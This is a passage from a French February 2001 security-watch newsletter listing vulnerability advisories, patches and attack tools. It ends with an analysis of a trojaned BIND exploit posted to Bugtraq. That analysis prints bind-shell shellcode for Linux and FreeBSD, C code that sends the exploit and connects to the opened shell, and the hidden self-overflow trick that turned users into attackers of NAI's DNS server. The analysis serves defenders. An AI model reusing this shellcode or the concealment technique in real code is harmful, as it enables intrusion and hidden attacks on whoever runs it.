Bugtraq MICROSOFT Déni de service sur les clients UDP Il est possible de provoquer à distance un déni de service sur les clients UDP en faisant exécuter un code malicieux. Moyenne 06/02 Windows 95, 98, NT et 2000 'java.net.DatagramSocket' Epuisement des sockets UDP Aucun correctif http://www.guninski.com/winudp.html Guninski #37 NOVELL Vulnérabilité dans 'Novell NetWare' 'Novell Netware' est vulnérable à une attaque de type 'man-in-the-middle' permettant à un utilisateur malveillant de récupérer des données sensibles. Critique 15/02 Novell NetWare 5.0 et 5.1 Processus d'authentification Mauvaise implémentation du protocole Aucun correctif http://razor.bindview.com/publish/advisories/adv_NovellMITM.html Razor PGP4PINE Echec lors d'identification de clés publiques expirées Une erreur dans le code de 'pgp4pine' lors de l'utilisation d'une clé publique expirée aboutit à la transmission de données en clair au lieu de notifier l'utilisateur. Critique 22/02 'pgp4pine-1.75-6' en relation avec GnuPG Version 1.0.4 et Pine Version 4.2.1 'pgp4pine-1.75-6' Non existence du code permettant de vérifier l'expirationd'une clé publique Aucun correctif http://www.linuxsecurity.com/advisories/other_advisory-1162.html Linux Security QNX Débordement de buffer dans le serveur FTP Un utilisateur distant peut provoquer un débordement de buffer sur le serveur FTP de la plate-forme temps réel QNX. Moyenne 02/02 Serveur FTP 5.60 livré avec QNX 4.25 (version commerciale) Code source Mauvaise vérification des paramètres Aucun correctif http://www.securityfocus.com/archive/1/160129 Bugtraq Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 29/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 SUN Débordement de Un utilisateur local Forte 31/01 Aucun correctif Bugtraq buffer dans 'ximp40' sous Solaris peut provoquer un débordement de buffer afin d'acquérir des privilèges plus élevés. Sun Solaris 8.0 et 8.0_x86Sun Solaris 7.0 et 7.0_x86 'ximp40.so.2' (libcall) Mauvaise vérification des paramètres passés en entrée http://www.securityfocus.com/bid/2322 SUN StarOffice Vulnérabilité dans 'StarOffice' Une vulnérabilité de type lien symbolique affecte localement 'StarOffice'. Moyenne 20/02 'StarOffice' (versions vulnérables non communiquées) 'StarOffice' Création dangereuse de fichiers temporaires Aucun correctif http://www.securityfocus.com/archive/1/163948 Bugtraq SYMANTEC Débordement de buffer dans 'PcAnywhere 9.0' Un utilisateur distant peut provoquer un déni de service contre 'PcAnywhere'. Forte 11/02 Symantec PcAnywhere 9.0 Port en écoute (5631, 65301) Mauvais traitement des données Aucun correctif http://www.securityfocus.com/archive/1/162253 Bugtraq AUTRES INFORMATIONS REPRISES D'AVIS ET CORRECTIFS Les vulnérabilités suivantes, déjà publiées, ont été mises à jour, reprises par un autre organisme, ou ont données lieu à la fourniture d'un correctif: CIAC Reprise de l'avis FreeBSD FreeBSD-SA-00:77 Le CIAC a publié, sous la référence L-036, l'avis FreeBSD FreeBSD-SA-00:77 concernant une vulnérabilité présente dans le système de fichiers 'procfs'. Cette vulnérabilité permet à un utilisateur d'accroître ses privilèges. http://www.ciac.org/ciac/bulletins/l-036.shtml Reprise de l'avis FreeBSD FreeBSD-SA-01:08 Le CIAC a publié, sous la référence L-029 l'avis FreeBSD concernant les modules 'ipfw' et 'ip6fw'. Il était en effet possible de rendre valide un paquet TCP normalement rejeté, sous certaines conditions . Le CIAC indique que la version FreeBSD 4.3 n'est pas vulnérable. http://ciac.llnl.gov/ciac/bulletins/l-029.shtml Reprise de l'avis FreeBSD FreeBSD-SA-01:12 Le CIAC a publié, sous la référence L-037, l'avis FreeBSD FreeBSD-SA-01:12 concernant une vulnérabilité présente dans 'periodic'. Cette vulnérabilité permet à un utilisateur ce compromettre certains fichiers par une attaque de type lien symbolique. http://www.ciac.org/ciac/bulletins/l-037.shtml Reprise de l'avis FreeBSD FreeBSD-SA-01:13 Le CIAC a publié, sous la référence L-039, l'avis FreeBSD FreeBSD-SA-01:13 concernant une vulnérabilité présente dans 'sort'. Cette vulnérabilité permet à un utilisateur ce compromettre certains fichiers par une attaque de type lien symbolique . http://www.ciac.org/ciac/bulletins/l-039.shtml Reprise de l'avis FreeBSD FreeBSD-SA-01:24 Le CIAC a publié, sous la référence L-047, l'avis FreeBSD FreeBSD-SA-01:24 concernant plusieurs vulnérabilités affectant les paquetages 'openssh' et 'ssh' (SSH1) . Ces vulnérabilités permettent l'acquisition de privilèges plus élevés ainsi que le déchiffrage de la session. http://ciac.llnl.gov/ciac/bulletins/l-047.shtml Reprise de l'avis Hewlett-Packard HPSBUX0101-137 Le CIAC a publié, sous la référence L-035, l'avis Hewlett-Packard HPSBUX0101-137 concernant une vulnérabilité présente dans 'Support Tools Manager'. http://ciac.llnl.gov/ciac/bulletins/l-035.shtml Reprise de l'avis Red Hat RHSA-2001:013-05 Le CIAC a publié, sous la référence L-045, l'avis Red Hat RHSA-2001:013-05 concernant plusieurs vulnérabilités dans les routines 'sysctl', 'ptrace' et 'mxcsr P4' du noyau Linux . Ces vulnérabilités permettent d'acquérir localement des privilèges plus élevés et de provoquer un déni de service. http://ciac.llnl.gov/ciac/bulletins/l-045.shtml Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 30/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 Reprise de l'avis RedHat RHSA-2001:014-03 Le CIAC a repris, sous la référence L-048, l'avis Red Hat RHSA-2001:014-03 concernant un débordement de buffer dans le paquetage 'vixie-cron'. Cette vulnérabilité permet d'acquérir des droits plus élevés. http://ciac.llnl.gov/ciac/bulletins/l-048.shtml Reprise de l'avis Sun #00196 Le CIAC a publié, sous la référence L-031, l'avis Sun #00196 concernant une vulnérabilité présente dans 'AnswerBook2'. Cette vulnérabilité permet à tout utilisateur d'accéder à l'interface d'administration d'Answerbook2 puis d'exécuter des commandes sur le serveur. http://ciac.llnl.gov/ciac/bulletins/l-031.shtml Reprise de l'avis Sun #00197 Le CIAC a publié, sous la référence L-033, l'avis Sun #00197 concernant une vulnérabilité présente dans Java Web Server. Cette vulnérabilité permet d'utiliser le module d'administration afin d'exécuter du code sur le serveur. http://ciac.llnl.gov/ciac/bulletins/l-033.shtml Reprise de l'avis Sun #00199 Le CIAC a publié, sous la référence L-032, l'avis Sun #00199 concernant une vulnérabilité présente dans la machine 'Java'. Cette vulnérabilité permet à une classe d'accéder à une autre classe et d'utiliser des fonctionnalités non autorisées. http://ciac.llnl.gov/ciac/bulletins/l-032.shtml FREEBSD Disponibilité de plusieurs correctifs FreeBSD annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages: inetd FreeBSD-SA-01:11 (Revised) periodic FreeBSD-SA-01:12 (Revised) sort FreeBSD-SA-01:13 micq FreeBSD-SA-01:14 tinyproxy FreeBSD-SA-01:15 mysql FreeBSD-SA-01:16 exmh2 FreeBSD-SA-01:17 bind FreeBSD-SA-01:18 ja-xklock FreeBSD-SA-01:19 mars_nwe FreeBSD-SA-01:20 ja-elvis FreeBSD-SA-01:21 dc20ctrl FreeBSD-SA-01:22 telnetd_krb FreeBSD-SA-01:25 http://www.linuxsecurity.com/advisories/ HP Correctifs pour 'Support Tools Manager' (mise à jour) HP vient de mettre à jour le bulletin HPSBUX0101-137. Il fournit une liste exhaustive des correctifs contre la vulnérabilité affectant les 'Support Tools Manager'. http://europe-support2.external.hp.com/ IBM Disponibilité des correctifs pour 'bind' IBM a publié, sous la référence MSS-SVA-E01-2001:002.1, un bulletin annonçant la prochaine disponibilité des correctifs contre les vulnérabilités découvertes dans 'bind'. Cet avis est la première réponse d'IBM aux vulnérabilités annoncées depuis 15 jours. Les correctifs seront bientôt disponibles pour AIX 4.3.3 sous la référence IY16182. Un correctif temporaire est néanmoins téléchargeable à l'adresse suivante: ftp://aix.software.ibm.com/aix/efixes/security/multiple_bind_vulns_efix.tar.Z http://www-1.ibm.com/services/continuity/recover1.nsf/advisories/8525680F006B9445852569F300072DC0/$file/sva002.txt ISS Disponibilité de System Scanner 4.1.1 ISS annonce la disponibilité de la version de maintenance 4.1.1 de System Scanner 4.1. Cette version met à jour la 'console communications' (CAL) qui, dans de rares situations, provoquait une erreur appelant Dr. Watson. Cette version prend en compte toutes les mises à jour précédentes. Aucune fonctionnalité de System Scanner n'a été modifiée. Un accès client est nécessaire afin de télécharger cette mise à jour. https://www.iss.net/cgi-bin/download/customer/customer-select.cgi LINUX Disponibilité du noyau version 2.4.1 pour Linux La dernière version stable du noyau Linux est la version 2.4.1. Elle corrige notamment des vulnérabilités pouvant mener à des attaques de type liens symboliques. http://www.kernel.org/pub/linux/kernel/v2.4/ Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 31/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 LINUX DEBIAN Disponibilité de nombreux correctifs Debian annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages: inn2 DSA-023-1 cron DSA-024-1 OpenSSH DSA-025-2 bind DSA-026-1 OpenSSH DSA-027-1 man-db DSA-028-1 proftpd DSA-029-1 xfree86 DSA-030-2 http://lists.debian.org/debian-security-announce-01 LINUX MANDRAKE Disponibilité de nombreux correctifs Mandrake annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages: bind MDKSA-2001:017 kdesu MDKSA-2001:018 xemacs MDKSA-2001:019 cups MDKSA-2001:020-1 proftpd MDKSA-2001:021 vixie-cron MDKSA-2001:022 cups MDKSA-2001:023 http://www.linux-mandrake.com/en/security LINUX REDHAT Disponibilité de nombreux correctifs RedHat annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages: inetd RHSA-2001:006-03 bind RHSA-2001:007-03 xemacs RHSA-2001:010-06 xemacs RHSA-2001:011-03 kernel RHSA-2001:013-05 vixie-cron RHSA-2001:015-03 Http://www.linuxsecurity.com/advisories/ NetBSD Disponibilité de nombreux correctifs RedHat annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:. bind NetBSD-SA2001-001 Ssh/openssh NetBSD-SA2001-003 ftp://ftp.netbsd.org/pub/NetBSD/misc/security/advisories/ ORACLE Disponibilité de la mise à jour Oracle JSP 1.1.2.0.0 Oracle vient de mettre à disposition la mise à jour d'Oracle JSP, Apache/JServ version 1.1.2.0.0. Cette version corrige la vulnérabilité découverte par Guninski. http://www.securityfocus.com/archive/1/162367 http://www.securityfocus.com/archive/1/162381 Parade contre la vulnérabilité 'Oracle JVM' Oracle vient de proposer une parade contre la vulnérabilité affectant la 'Machine Virtuelle Java Oracle JSP/SQLJSP' . La solution proposée est d'accorder explicitement les permissions au répertoire contenant le document. http://www.securityfocus.com/archive/1/162678 TIS/NAI Correctif pour Gauntlet et Webshield TIS/NAI a publié un correctif pour Gauntlet 4.2, 5.0, 5.5 et E-ppliance 300 1.0 et 1.5 qui résout plusieurs vulnérabilités dans BIND. Ce correctif est restreint aux possesseurs d'un numéro d'accès. http://www.pgp.com/naicommon/download/upgrade/upgrades-pgp.asp Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 32/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 VANDYKE Disponibilité de la version 'VShell 1.0.2' Van Dyke Technologies annonce la mise à jour de VShell en version 1.0.2. Une vulnérabilité dans les précédentes versions permettait d'exécuter du code à distance dans un contexte local, sous Windows NT 4.0 et 2000. @Stake possède un code d'exploitation qui ne sera révélé qu'à la fin du mois de février 2001. http://www.vandyke.com/products/vshell/security102.html CODES D'EXPLOITATION Les codes d'exploitation des vulnérabilités suivantes ont fait l'objet d'une large diffusion: BIND BugTaq vecteur involontaire d'une attaque contre NAI NAI a été victime d'attaques involontaires, majoritairement causées par les abonnés de la liste Bugtraq. En effet, un code exploitant les récentes vulnérabilités de BIND, posté sur la liste, provoquait une attaque dirigée vers les serveurs DNS de Network Associates, heureusement protégés. NAI a néanmoins subi un flux continu de requêtes, par près d'un quart des abonnés Bugtraq, paralysant les serveurs pendant au moins une heure trente. Le code d'exploitation a été supprimé de la liste par les modérateurs. http://www.bull.fr/securinews/courant/41-01_3.html CISCO Détail de l'alerte sur Cisco CSS (Arrowpoint) @stake a publié un bulletin expliquant dans les détails les vulnérabilités présentes dans les commutateurs Cisco CSS (Arrowpoint) . http://www.atstake.com/research/advisories/2001/a013101-1.txt FreeBSD Code d'exploitation concernant la vulnérabilité 'ipfw' Un code d'exploitation concernant la vulnérabilité affectant les modules 'ipfw' et 'ip6fw' sur FreeBSD a été publié sur Securiteam. http://www.securiteam.com/unixfocus/ECEpass_-_proof_of_concept_code_for_FreeBSD_ipfw_bypass.html SSH Code d'exploitation de la vulnérabilité 'deattack.c' Un article détaillé exposant une technique d'exploitation du débordement de buffer présent dans le module 'deattack.c' a été publié dans la liste BugTraq. Le code proposé permet, moyennant cependant quelques essais et tests difficilement réalisables en aveugle, d'ouvrir une connexion SSH sous l'autorité du compte 'root', sans authentification. http://www.securityfocus.com/archive/1/164143 BULLETINS ET NOTES Les bulletins d’information suivants ont été publiés par les organismes officiels de surveillance et les éditeurs: AXENT/SYMANTEC Mise à jour pour NetProwler 3.5x (SU3) La mise à jour pour NetProwler 3.5x permet à un agent 'Intruder Alert' d'être notifié via les 'trap' SNMP lors de la reconnaissance d'une signature. http://www2.axent.com/swat/index.cfm?Doc=2001_01_31 CERT Mise à jour de la page 'Security Improvement Modules' Le CERT a mis à jour sa page intitulée 'Security Improvement Modules' (modules visant à améliorer la sécurité). Deux modules concernant 'Solaris 2.x' ont été ajoutés : 34. Disabling user accounts on systems running Solaris 2.x 35. Installing OpenSSL to ensure availability of cryptographic libraries on systems running Solaris 2.x. http://www.cert.org/security-improvement/index.html#uaSSL CIAC Bulletin d'informations sur le ver 'Ramen' Le CIAC a publié, sous la référence L-040, un bulletin d'information au sujet du ver 'Ramen' . Il propose une méthode permettant d'éradiquer 'Ramen' d'un système ayant été attaqué et reprend sommairement les vulnérabilités exploitées (wu-ftp, LPRng, rpc.statd). http://www.ciac.org/ciac/bulletins/l-040.shtml Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 33/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 EEYE eEye Digital Security annonce Retina 3.0 Le passage de la version 2.0 à la 3.0 de Retina est présenté comme un pas de géant par l'éditeur. Retina 3.0 inclut la vérification de centaines de nouvelles vulnérabilités. De plus, la totale réécriture du moteur de détection fait de Retina le plus complet et le rapide des scanners actuellement sur le marché. http://www.eeye.com/html/Products/Retina/overview.html MANDRAKESOFT Disponibilité de la version bêta de Mandrake Security Mandrake Security est un projet Open Source sous licence GPL dont le but est la création d'un firewall / routeur configurable via une interface web. Le projet utilise des technologies XML, PhP et Apache. http://www.linux-mandrake.com/fr/pr-firewallbeta.php3 LINUX REDHAT Red Hat Linux 'Wolverine' version bêta Red Hat vient d'annoncer la nouvelle version bêta de sa distribution Linux. Baptisée 'Wolverine', elle inclut les derniers paquetages (kernel 2.4.1, glibc 2.2.2, XFree86 4.0.2) et apporte des améliorations notables au niveau du support USB. Cependant, il est recommandé de ne pas utiliser les versions bêta en production et d'attendre la version stable. https://listman.redhat.com/pipermail/redhat-watch-list/2001-February/000252.html ATTAQUES OUTILS HACKERWATCH.ORG Description Le site 'HackerWatch.org', administré par la société NeoWorx et éditeur des produits NeoTrace et NeoWatch, a pour mission de centraliser les alertes générées par les systèmes de détection d'intrusion. L'objectif annoncé est de pouvoir détecter et identifier l'origine des différentes attaques distribuées de plus en plus rencontrées sur l'Internet A ce jour, la collecte de données est limitée aux événements générés par l'outil d'analyse NeoTrace Pro et le parefeu personnel NeoWatch qui disposent d'un mécanisme de soumission automatique. Une extension du service à d'autres outils est annoncée sans autre précision. Un service d'alerte gratuit est planifié qui permettra d'informer en temps réel les utilisateurs de l'apparition d'une nouvelle menace. Les informations publiées par ce service, qui utilise les résultats de l'analyse et de la corrélation des données acquises, ne contiendront aucune adresse IP afin d'éviter l'exploitation de ces résultats par un tiers mal intentionné. Pour autant qu'elle puisse apparaître louable, cette initiative dont on espère qu'elle n'est pas uniquement dictée par le marketing commercial reste fragilisée par le choix d'une unique source de donnée: une gamme de produits encore peu répandus. Rappelons que le projet CIDER, engagé par l'une des sections de la marine américaine et soutenu par les principaux organismes de sécurité, a conduit au développement d'un outil, Shadow, offrant un service similaire bien que non encore coordonné au niveau mondial. N'oublions pas le remarquable projet arachNIDS lancé autour de la mise en commun de signatures SNORT par un consultant et ex-pirate MaxVision. Notons enfin que la société NeoWorx vient d'annoncer la disponibilité de la version commerciale du pare-feu personnel NeoWatch (notre rapport de veille N°30 du mois de Janvier 2001), version fonctionnant sous Windows™ 95, 98, ME, 2000 mais aussi désormais sous NT4. Complément d'information http://www.hackerwatch.org/faq/ http://www.nswc.navy.mil/ISSEC/CID http://www.whitehats.com/ids/index.html TRIANGLE BOY Description 'SafeWeb', fournisseur d'accès WEB anonyme, annonce la prochaine disponibilité du logiciel 'Triangle Boy' destiné renforcer l'anonymat des connexions WEB. La copie de la notice d'information, proposé ci-après, précise que cet outil serait à même de traverser les dispositifs de sécurité mis en place. Il est, en conséquence, fort probable que 'Triangle Boy' utilise un mécanisme de tunnel - paramétrable en fonction des filtres de sécurité - établi entre le client et un service de relayage. Want to help promote democracy and allow users around the world to have access to an uncensored Web? You will soon be able to do just that, by downloading our soon-to-be-released application, Triangle Boy. Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 34/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 Corporations, governments, and other entities have begun to block access to SafeWeb in an effort to thwart our mission to promote the free flow of information and ideas on the Internet and to protect the online privacy rights of all Internet users. Triangle Boy is a free, open source, peer-to-peer application that will bypass firewalls and other mechanisms that attempt to block access to SafeWeb. Users who are currently blocked from directly accessing SafeWeb (or any other site) will be able to access it indirectly through any other computer running Triangle Boy. Triangle Boy is scheduled for release at the end of February. Volunteers will be able to download the application from the SafeWeb site at www.safeweb.com. A première vue sans danger, 'Triangle Boy' est cependant un produit à surveiller de près d'autant qu'il apparaît avoir été développé à l'origine pour la CIA qui possède une prise de participation dans SafeWeb via son "incubateur" In-QTel. Cette information publiée mi-Février par SafeWeb, et relayée par de nombreux journaux Américains dont le WallStreet Journal, laisse sous-entendre que le service d'anonymisation en ligne puisse servir d'autres intérêts … En réaction à ces annonces, le webmaster du site de veille indépendant Cotse.com, ou 'The Church of the Swimming Elephant, indique dans la liste de diffusion alt.2600 qu'une version évoluée de l'utilitaire 'LeapFrog' offrant le même service sera disponible dans les semaines à venir sur son site: "… Regarding safeweb. I get a kick out of this hype for "triangle-boy", it is basically a modified version of Leapfrog. So, we are now almost done modifying Leapfrog to release our own version. We currently have it working and are just ironing out a few glitches now. It will hopefully be released mid-end week this week or maybe next...with no CIA involvement or financing ;) We will most likely release it open source too. … Stephen K.Gielda " Notons à ce propos l'existence d'un autre produit garantissant la furtivité des accès Internet - NetEraser - développé par la société SAIC (Science Applications International), société ayant elle aussi fait d'objet d'une prise de participation en février 2000 par In-Q-Tel. Complément d'information https://fugu.safeweb.com/webpage/press_room/tboy.html http://groups.google.com/groups?q=Re:+Cotse+nears+3+million+hits+a+week&hl=en&lr=&safe=off&rnum=1&seld=917935185&ic=1 SITE VULNERABILITIES.ORG Description Le site 'Vulnerabilities.org' géré par deux administrateurs systèmes américains propose entre autres services, deux services gratuits d'audit à distance. Le service 'MyHost NMAP Portscan' autorise le sondage des ports actifs d'un système dont l'adresse IP ou le nom de domaine aura été préalablement fourni. Ce service est basé sur l'utilitaire bien connu 'nmap' (version utilisée: 2.54Beta). Le service 'MyHost Vulnerability Scan' complète l'analyse précédente en s'intéressant aux vulnérabilités exploitables à distance sur le système d'où provient la requête de connexion. L'utilitaire 'Nessus' est utilisé avec une bibliothèque de plus de 580 tests. Une troisième service, dénommé 'Any Host Scan', dont l'accès est réservé aux clients enregistrés, permet d'étendre le service précédent à un ensemble de machines. Un processus d'analyse récurrent est proposé. Cette 'offre' confirme l'intérêt porté aux logiciels d'audit disponibles en 'OpenSource', dont principalement 'nmap'et 'Nessus', par de nombreuses 'jeunes pousses'. Notons que, si le service de sondage de port peut être initié contre n'importe quel système dont l'adresse IP ou le nom est connu, le service d'analyse de vulnérabilité est, lui, limité à l'adresse d'origine de la requête. Il est fort probable que les services de ce type puissent faire l'objet d'une utilisation abusive bien que, dans le cas présent, l'utilisateur soit averti que toutes ses requêtes seront journalisées. Les procédures de sécurité doivent en conséquence prendre en compte l'existence de tels services: l'origine de toute tentative de sondage devra être validée afin de vérifier qu'un service 'commercial' n'est pas à la source du problème. Si tel est le cas, il sera nécessaire de déterminer si cet 'audit' est le fait d'un commanditaire interne ou d'un tiers externe à la société, ce qui suppose d'analyser les journaux des dispositifs de sécurité du point d'accès de l'entreprise. La présence de traces de connexion sur le site offrant le service peu de temps avant le sondage permettra de confirmer l'origine interne et de prendre les mesures qui s'imposent. Complément d’information Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 35/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 http://www.vulnerabilities.org/analysis.html CRACKWHORE 2.2 Description L'utilitaire 'CrackWhore' a dernièrement fait l'objet de différents articles dans la presse spécialisée. Cet outil d'attaque (ou de test) de sites WEB intègre en effet une fonctionnalité, activée par défaut, permettant de publier la liste des sites et des comptes d'accès ayant été crackés. La publicité faite aux outils d'audit et d'attaque à la suite d'un article de presse conduit souvent à une recrudescence d'attaque dans les semaines qui suivent. Nous avons en conséquence voulu tester 'CrackWhore' pour déterminer l'intérêt d'une utilisation comme outil d'audit mais aussi valider la menace présentée par cet utilitaire. Livrée sous forme exécutable, écrite en Visual Basic 6, la version 2.2 est distribuée avec un dictionnaire de 15088 couples identifiant/mot de passe et un fichier contenant 160 tests de vulnérabilités WEB. Ces fichiers peuvent être édités afin d'ajouter de nouveaux tests. Une fonction permettant de masquer l'origine des connexions peut être activée. Il faut pour cela renseigner une liste de serveurs Proxy-HTTP chargés de masquer l'adresse IP source. Une option autorise le changement régulier du serveur utilisé ceci dans l'optique de renforcer l'anonymat. Notons la présence sur le site 'SubReality' d'un script destiné à qualifier la qualité d'un Proxy HTTP. En pratique, et bien que l'outil soit ergonomique, de nombreux défauts dont l'impossibilité de disposer des sources, le rendent inutilisable en tant qu'outil de test. Parmi les problèmes constatés, notons l'impossibilité de tester un site utilisant SSL ou un port non standard, la pauvreté de la documentation, la présence d'une fonction de publication activée par défaut (documentée) et d'une fonction d'activation d'un bandeau publicitaire (non documentée). Comme souvent, une rapide étude du binaire du programme révèle beaucoup d'informations utiles sans avoir à préalablement lancer le produit: Le chargement d'un fichier 'ads.dat' contenant les URL des bandeaux publicitaires, L'URL et les variables utilisées pour transmettre les résultats: un POST sur '/scripts/cgi/passwords.cgi' avec les variables suivantes: task="add" & name ="xxx" & url ="xxx" & cracker = "CrackWhore" La technique de recherche des pages protégées à l'aide des préfixes 'représentatifs' suivants: /members/, /members-area/, /mem/, /m/, /private/, /priv/, /protected/, /protect/, /resctricted/ (noter l'erreur de frappe), /restrict/, /authorize/, /authorise/, /auth/, galleries/, /gallery/, /secured/, /secure/, /s/ Notons que la technique de transmission des résultats, non sécurisé, peut être mise à profit pour saturer le site de fausses informations, ou mesurer son audience en transmettant des références d'accès pointant sur un attrapemouche … Complément d'information http://www.subreality.net/ TECHNIQUES ATTAQUE INDIRECTE DU SITE NAI Description Le 31 janvier 2001, BugTraq, la célèbre liste de diffusion hébergée par Security Focus a involontairement été à l'origine des attaques en déni de service perpétrées contre la société NAI au début du mois de février. Un code d'exploitation de l'une des nombreuses vulnérabilités découvertes dans le service 'bind' a en effet été diffusé avec l'approbation des modérateurs de la liste. Approbation trop rapide puisqu'il est rapidement apparu que ce code contenait en réalité une fonction masquée destinée à explicitement attaquer le serveur DNS de la société NAI. Il apparaît qu'une analyse superficielle du code publié ne permet pas de juger de l'innocuité du dit code, code remarquablement architecturé. Tout utilisateur ayant exécuté ce code a ainsi immédiatement et 'involontairement' participé à une attaque distribué en déni de service (DdoS). Notons à ce sujet et comme le souligne un utilisateur de la liste que la faute ne revient pas aux modérateurs de Bugtraq car ils ne rejettent que les messages n’adhérant pas à la politique de la liste. Les personnes utilisant aveuglément un code diffusé sur l’Internet ne récoltent que ce qu’ils ont semé. Et ce jour-là, ils ont semé la panique ! Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 36/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 Une analyse approfondie du code révèle des procédés de dissimulation fort intéressants qui vont être détaillés. Comme pour tout code d'exploitation d'un débordement de buffer, le code diffusé est constitué des deux modules complémentaires: 1. un code exécuté localement, conçu pour déclencher le débordement de buffer par exploitation d'un problème spécifique dans l'application distante, 2. un code assembleur, dit 'shellcode', placé sur la pile du système distant et exécuté par celui-ci à la suite du débordement de buffer. Comme pour tout code d'exploitation d'un débordement de buffer, le regard de l'analyste se porte en priorité sur le 'shellcode' à la recherche de la fonction active, généralement marqué par la présence d'une chaîne référençant un shell tel que '/bin/sh', d'un appel système marqué par la chaîne 'cd 80' en environnement Linux/Intel et la présence d'un JMP en en-tête du code. Le code publié contient bien les 'shellcodes', un par système d'exploitation cibles: Char linux_shellcode[] = /* modifyed Aleph1 linux shellcode to * bind to tcp port 31338. hey aleph1 * :) */ "\xeb\x34\x5e\xbb\x01\x00\x00\x00\x89\xf1\xb8\x66\x00\x00\x00\xcd" "\x80\x89\x46\x14\x8d\x46\x30\x89\x46\x18\x31\xc0\x89\x46\x20\x8d" "\x46\x0c\x89\x46\x24\xb8\x66\x00\x00\x00\xbb\x0b\x00\x00\x00\x8d" "\x4e\x14\xcd\x80\xeb\xef\xe8\xc7\xff\xff\xff\x02\x00\x00\x00\x02" "\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff" "\xff\xff\xff\xef\xff\xff\xff\x00\x04\x00\x00\x00\x00\x00\x00\x02" "\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\0"; char bsd_shellcode[] = /* freebsd bind shellcode by LaMerZ , thnx :) */ "\xeb\x37\x5e\x6a\x11\x6a\x02\x6a\x02\x6a\x66\x8d\x05\x61\x00\x00" "\x00\xcd\x80\x89\xc2\x6a\x10\x89\xf0\x50\x31\xc0\x50\x68\x24\x10" "\x00\x00\x8d\x46\x0f\x50\x52\x68\x88\x00\x00\x00\x8d\x05\x85\x00" "\x00\x00\xcd\x80\x83\xc4\x1c\xeb\xdc\xe8\xc4\xff\xff\xff\x00\x02" "\x00\x35\xa1\x45\x03\x96\xe8\xb1\xff\xff\xff/bin/sh\0"; LINUX Un JUMP Un Appel Système Un indice … Un Shell BSD Un JUMP Un Appel Système Un Shell Le code publié contient aussi un module d'activation conforme à la fonction annoncée: 1. Ouverture d'une connexion UDP sur le port DNS et transmission du code, préalablement paramétré et copié dans le buffer de travail 'expl_buffer': … … memcpy(expl_buffer, shellcode, PACKETSZ); … … to.sin_family = AF_INET; to.sin_port = htons(53); Service DNS to.sin_addr.s_addr = remote_ip; Adresse de la cible if ((sendto(fd, &expl_buffer, PACKETSZ, 0, (struct sockaddr *) & to, sizeof(struct sockaddr)) != PACKETSZ)) { perror("sendto"); exit(1); } 2. Envoi buffer 'expl_buffer' Ouverture d'une connexion vers un port du système distant supposé avoir été ouvert par le shellcode. if ((fd2 = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) Un SOCKET TCP { perror("socket"); exit(1); } /* linux & freebsd shellcodes bindport is same, so dont even check. */ to.sin_port = htons(31338); Le PORT distant if (connect(fd2, (struct sockaddr *) & to, sizeof(struct sockaddr)) < 0) Une connexion TCP { perror("connect"); exit(1); } Ainsi, le code publié est conforme au modèle désormais classique d'un code d'exploitation. Bien sur, un tel code s'il devait être exécuté - à des fins de validation et non dans un but de malveillance - le sera dans un environnement isolé afin d'éviter toute propagation sur le système d'information et l'Internet. Dans ces conditions, l'analyste ne manquera pas de constater la tentative de connexion vers le service DNS cible dont l'adresse est passée en paramètre mais aussi un grand nombre de tentatives effectuées vers une adresse inconnue 161.69.3.150, en pratique celle du DNS de NAI. Un examen plus attentif révèle alors l'utilisation de la fonction 'fork', rarement usitée dans les codes d'exploitation de ce type: int set_ptr(char *buff, int offset, unsigned long val, int s) Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 37/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 { ... if (s) if (!fork()) /* simply copy value to offset */ memcpy(©_buff[offset], &val, sizeof(val)); ... } Ce code conduit à dupliquer le processus à partir du point d'appel de la fonction fork puis à copier le contenu du buffer 'val' dans le buffer 'copy_buff' à partir de la position 'offset'. Il n'y a rien à dire à ce niveau mais l'examen de l'un des appels de la fonction 'set_ptr' met en évidence la remarquable astuce utilisée: set_ptr(shellcode, BIND_OFF_02, (unsigned long) shellcode, 1); Le shellcode est recopié sur lui-même avec un décalage de BIND_OFF_02 (1028 octets) provoquant ainsi un débordement de buffer LOCAL dans le processus fils entraînant en conséquence l'exécution LOCALE du shellcode. Un superbe tour de passe-passe parfaitement réussi et difficilement détectable d'autant que le processus père continu son travail ! Notons que les autres appels à la fonction 'set_ptr' ne sont présents que pour le 'décors' car le code actif est inactivé par le passage de la valeur 0 (FALSE) dans le paramètre 's'. set_ptr(shellcode, BIND_OFF_01, SHELL_OFFSET_2, 0); set_ptr(shellcode, BIND_OFF_03, i, 0); set_ptr(shellcode, BIND_OFF_04, remote[type].ret + (i * remote[type].otebp), 0); L'étude du shellcode confirme qu'il contient un code assembleur entraînant la 